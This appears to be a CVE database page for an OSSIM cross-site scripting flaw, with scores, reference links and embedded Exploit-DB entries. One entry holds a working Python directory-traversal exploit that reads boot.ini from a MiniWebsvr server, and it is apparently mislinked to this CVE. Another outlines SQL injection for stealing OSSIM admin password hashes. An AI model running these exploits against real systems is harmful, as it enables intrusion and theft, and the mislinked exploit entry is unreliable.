CVE-2008-0919
published 2008-02-22CVE-2008-0919: Cross-site scripting (XSS) vulnerability in session/login.php in Open Source Security Information Management (OSSIM) 0.9.9 rc5 and earlier allows remote…
PriorityP420medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
3.75%
88.5th percentile
Cross-site scripting (XSS) vulnerability in session/login.php in Open Source Security Information Management (OSSIM) 0.9.9 rc5 and earlier allows remote attackers to inject arbitrary web script or HTML via the dest parameter.
Affected
25 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
| open_source_security_information_management | os-sim | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiniWebsvr 0.0.9a - Remote Directory Traversal
exploitdb·2008-03-03
CVE-2007-0919 MiniWebsvr 0.0.9a - Remote Directory Traversal
MiniWebsvr 0.0.9a - Remote Directory Traversal
---
import socket
import sys
print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'
host = "127.0.0.1"
port = 8080
if sys.argv[1:]:
host = sys.argv[1]
if sys.argv[2:]:
port = int(sys.argv[2])
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
while True:
data = s.recv(4096)
if not data:
break
print data
except:
print "Connection Error"
# milw0rm.com [2008-03-03]
Exploit-DB
OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection
exploitdb·2008-02-21
CVE-2008-0920 OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection
OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection
---
Application: OSSIM
http://www.ossim.net
Version: 0.9.9rc5
Note: it is possible that the problem affects also earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com
1) Introduction
OSSIM it's a free implementation of Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, ...) managed from easy-to-use web panel.
2) SQL injection
The bug exist in portname parameter of modifyportform.php
It's possible to obtain hashed administrator password when user have rights to do port modification in "PORTS" tab.
http://[host]/ossim/port/modifyportform.ph
No writeups or analysis indexed.
http://osvdb.org/42006http://secunia.com/advisories/29046http://securityreason.com/securityalert/3689http://www.securityfocus.com/archive/1/488450/100/0/threadedhttp://www.securityfocus.com/archive/1/488617/100/0/threadedhttp://www.securityfocus.com/archive/1/488697/100/0/threadedhttp://www.securityfocus.com/bid/27929https://www.exploit-db.com/exploits/5171http://osvdb.org/42006http://secunia.com/advisories/29046http://securityreason.com/securityalert/3689http://www.securityfocus.com/archive/1/488450/100/0/threadedhttp://www.securityfocus.com/archive/1/488617/100/0/threadedhttp://www.securityfocus.com/archive/1/488697/100/0/threadedhttp://www.securityfocus.com/bid/27929https://www.exploit-db.com/exploits/5171
2008-02-22
Published